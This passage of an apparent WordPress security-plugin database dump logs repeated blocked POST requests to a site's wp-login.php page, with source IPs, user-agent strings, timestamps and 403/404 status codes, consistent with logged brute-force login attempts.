Safari\\/9537.53\"}','gu3MJfZebzG0jNq8Khy61cDC',0,1629868635.2216,111,'','POST',403,0,600,0,1,'',0),('142.54.177.3',2385948931,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','saryFbXJhoGzc3UZ9k47mOe1',0,1629869038.4961,135,'','POST',403,0,600,0,1,'',0),('142.54.177.3',2385948931,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko\\/20100101 Firefox\\/29.0\"}','d0cUgkLtoHRAy3uhwrsMDqZY',0,1629869105.1810,108,'','POST',403,0,600,0,1,'',0),('107.150.45.58',1805004090,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','cmiF2er1Yq0J9XyusxPSdQnN',0,1629869511.5894,124,'','POST',403,0,600,0,1,'',0),('192.151.144.59',3231158331,'','https://www.westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','YcmGRM7Ofixs1TuXIvHCyAgJ',0,1629869837.1347,113,'','POST',403,0,600,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','eN1mLSV6zQKbOYxy7adRc805',0,1629871370.6094,152,'','POST',403,0,600,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','ZTMGk6oyFxU7NCDg0WAPzEXe',0,1629871439.2130,161,'','POST',403,0,600,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','caOu3gwZ6Mn8Qb5SG7jCUtE4',0,1629871500.2215,200,'','POST',403,0,600,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','S9ejVvWb4osa10YmQlqREikK',0,1629871561.1521,176,'','POST',403,0,600,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','34czmqf2XTsWNu05yopwUZxH',0,1629871622.1147,198,'','POST',403,0,600,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','MWi5Xvn6HZSmAe47sbTrOoJR',0,1629871683.6912,117,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','4WGL1OcpPVvgaDRx9CytmQMn',0,1629871744.1796,113,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','tA4J3deYDVxTLvahXjzbfsCy',0,1629871805.1256,153,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','V5FuMXIhYgaAfkOoevBrPN3K',0,1629871866.1383,130,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','oXV7LYi3G4jNBQmA80tPlpkZ',0,1629871927.1496,107,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','pxt4TLaGh15e68suPDFCfjly',0,1629871988.7799,112,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','udr20DnUlvz9hQ6K1Rst3fim',0,1629872049.2646,103,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','yplEKYhwRMQPq5SsH1zfZ30t',0,1629872110.1758,135,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','o0EpMWt2YAqmZzwHBkXsLjcl',0,1629872171.0743,91,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','lC2EOdRoINa50TZcXM8ui3xe',0,1629872232.1561,134,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','XT90iufeMqYjG3Hb4dcSyohO',0,1629872293.7260,95,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','1Gbr2IBYTc8lNsxMmCRVvqHF',0,1629872354.0536,112,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','NWV1aRUcoAYj9uL05Qr7Jbvn',0,1629872415.2515,313,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','RyerlxLTQEghwzb4HJD7ja18',0,1629872476.0469,133,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','hVPiNIJMLD4Sge2Zbasn51RE',0,1629872537.1341,132,'','POST',404,0,700,0,1,'',0),('5.188.62.76',96222796,'','https://www.westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2228.0 Safari\\/537.36\"}','F213parvZAnCfoDwW6KuI8Lb',0,1629872562.6160,947,'','POST',403,0,600,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','CjRu85ewsHQOdnWBAYP4LxXU',0,1629872599.0208,110,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','SgKlwCqo52VZJWUBLEA3zpMt',0,1629872659.0966,104,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','zwxOdtTAiLSEuoaHCr3W9pXe',0,1629872720.1342,133,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','9aGnfdbjl4eEAvIqw76RoQUp',0,1629872781.1033,129,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','hpx2sYPQOcWo1LidD8g0CvtB',0,1629872842.0396,110,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','1w9h462vdCOPDQTZtfRpJ8as',0,1629872903.7757,107,'','POST',404,0,700,0,1,'',0),('69.30.244.20',1159656468,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','FM8YJRTdAStZkaI0Qr1hUHBy',0,1629872906.0437,131,'','POST',403,0,600,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','FhUujCpASVIGE6J5HQMmdgvq',0,1629872964.1536,111,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','AG2uh8b09DPZgmUfsEtjBWOJ',0,1629873025.1025,112,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','jba8oOliRWxdUyKgcHq7fnCp',0,1629873086.1916,147,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','Y9WV6gXw21jdeDCb0F8kuzaM',0,1629873147.2060,124,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','6pdbs4HMh5oJi8yIewXvl71R',0,1629873208.8367,97,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','2JjkVqegLlmf3Pacv1DHBzhW',0,1629873269.1424,95,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','c293rAdFswlxWqLY1Rn6iomJ',0,1629873330.0920,124,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','bJx7X3i0HAzryhYBQ2VcSl59',0,1629873391.1084,114,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','aIBbmQ4nHPqZpSrgD2cNxeOw',0,1629873452.1470,120,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','Qo5Tm6dA2z3VUrW89F1Z4wgq',0,1629873513.5993,115,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','DeS5a8LPydU9ziKQAVG42Ywo',0,1629873574.1770,104,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','J2qoU9BORQ5SVsgA87tHpYaI',0,1629873635.1240,125,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','iPdKqbxTm45VaSroN3pGQLBs',0,1629873696.7747,163,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','ZgJuQNADwv051bcyHFIYm4sk',0,1629873757.2102,124,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','Sxe85FshuRncz4Q2JTCVo6Y9',0,1629873757.2234,121,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','o2lsen9uHZJBRcyUWASNTCGO',0,1629873818.5919,117,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','YmqaksdVjgpl7uESLfACKPc3',0,1629873879.1942,110,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','xfQ0pk4sH8Big6IzouE9rNTe',0,1629873940.1021,109,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','EOJCepF3zrld68hLfQBgvYIn',0,1629874002.8191,107,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','RmqtvzsgESWZjrQ3PBGwHxJT',0,1629874064.1687,123,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','knizScrKVytYOA9lWRXIv5w3',0,1629874124.4403,144,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','W9FkbxvhSaE3Tmq7Y6GXu1H2',0,1629874185.2128,101,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','2fsp0drSuFm8JPCjBAO3ZEiY',0,1629874246.2741,112,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','cAPUhNK8tf9akpqjZvw5zuo3',0,1629874307.1895,394,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','SRuxF8hw2WoEIeCNJi1l3bnP',0,1629874368.3205,94,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','1d0JSHGKTxYh5FNgwLuUODIB',0,1629874430.4008,114,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','bgs6SnPO4fDXLMuajKkq1IvA',0,1629874490.2864,127,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','An6FdXNGT01Bgj9CewV4Hs5o',0,1629874551.2412,110,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','3uwxrDNIaKCY0WZvpiBORU59',0,1629874612.0884,158,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','0vaZqO64i8kMG9bsHjEzlILB',0,1629874673.3069,109,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','dikzElRruJN4B5cpt0XZQqnb',0,1629874734.8091,683,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','pG1TPu3zmR5x2lUykN7WgtbB',0,1629874795.4050,107,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','0JR1npD7QWsmaeXYtEbwKNgF',0,1629874856.0887,113,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','d6FfA8xKMRvJVEYBlG30tCST',0,1629874917.1153,109,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','XDVUS6J30mpROMAy2bWoHPLg',0,1629874978.0243,383,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','5xAX9c8Qwn0CjHMIZlky7pFi',0,1629875039.9898,124,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','SWngs7PDr45e1ANqoaxGpKdb',0,1629875100.1028,196,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','CnXzOqV6D0LjGEYgBpPbrfla',0,1629875161.3166,111,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','cDkXHLPJatsQg51C7UdBGW6w',0,1629875222.1092,130,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','gRIci8CBsHfmJt3eYpadD9Nz',0,1629875283.0274,1015,'','POST',403,0,600,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','ZqGmPduisNxMTtI3CgERn9O4',0,1629875344.5396,112,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','Jl47DBUOFpY3PeKoqa6tIvNr',0,1629875405.1526,605,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','8dBgSswEkcRJlMjzmGFpbHq7',0,1629875466.2712,161,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','dnVhBvZbT9Is17Jkxm5qQaXy',0,1629875527.2661,121,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','eDXfaZjWE2lrFPmd1UGqCu8Y',0,1629875588.1972,100,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','gbZaK69U5Hf41lu2zxhEYcTP',0,1629875649.6616,110,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','tzmYeQH4ROJGr8gqZNBd7wik',0,1629875710.0382,167,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','ZikCF0WTO9PQUfXnGhHNJY13',0,1629875771.1311,110,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','DoS9QvsFdRcMBAqxpKT8WI5h',0,1629875832.1149,110,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','bvszZN8ki9710FrJfnm6AxIM',0,1629875893.3121,124,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','mK2BkFUyDwV0WApHf5Ov7zJi',0,1629875954.5565,109,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','92Q5vgM0dkuipXYCz8OnrwJt',0,1629876015.5334,103,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','2OiVQEcIFD8pS9WrCmyBMPnw',0,1629876076.1395,128,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','iLefMK94FZopsB2wW6kNzADl',0,1629876137.1060,136,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','JlmxXNgVWRa8Zpz9cskj534d',0,1629876198.1300,144,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','B7NDanUy21bwJpt6G3Mml4zA',0,1629876259.8003,459,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','yk8rQTb7hqiwn5oGEUY09gzN',0,1629876320.2044,138,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','tlivIAq0aFWmeTVSrg9R6Chy',0,1629876381.2446,1043,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','QUyRj7B5CEAniv6LZSbK2rmc',0,1629876442.2383,119,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','7oDQck45LOuzMPB6qdsgCR8T',0,1629876503.1233,117,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','VA4E7y3WcwfYLUhQ5lxzFuaj',0,1629876565.4458,162,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','X8lxva30EMnV5czZTKJOqDmu',0,1629876625.1038,103,'','POST',404,0,700,0,1,'',0),('107.150.59.246',1805007862,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','R1P8xTCO9K3ytiq60LQuEwYb',0,1629876642.7933,117,'','POST',403,0,600,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','HWSXCh04Anum7bgYLs6vftGr',0,1629876686.1510,101,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','bVDGp8aQdLqKeWt9fE6gMzR4',0,1629876747.1521,919,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','uADiTRGUeafnB6wX4kCxJ5NV',0,1629876808.3019,134,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','Puk3yZN7Q6YXWC9inKqLgwoS',0,1629876870.6639,160,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','UFLBDKe5bQw4jk0MzGZrHo9x',0,1629876931.0976,112,'','POST',404,0,700,0,1,'',0),('192.151.145.141',3231158669,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','bVsFYL9kJMy6B4h8r0nTZiE1',0,1629876990.4404,144,'','POST',403,0,600,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','kdWLfMtHOJTZXVoyvzlc4rnR',0,1629876991.1337,101,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','uIY08MAsmvdBKhSJk9iLqn7H',0,1629877052.1998,120,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','l3VifWD1RHZjBhyU9qT5PMGa',0,1629877113.1784,108,'','POST',404,0,700,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','aK7tFSDip2N0UPAf6XWokJCl',0,1629877174.8272,135,'','POST',404,0,700,0,1,'',0),('192.151.145.141',3231158669,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko\\/20100101 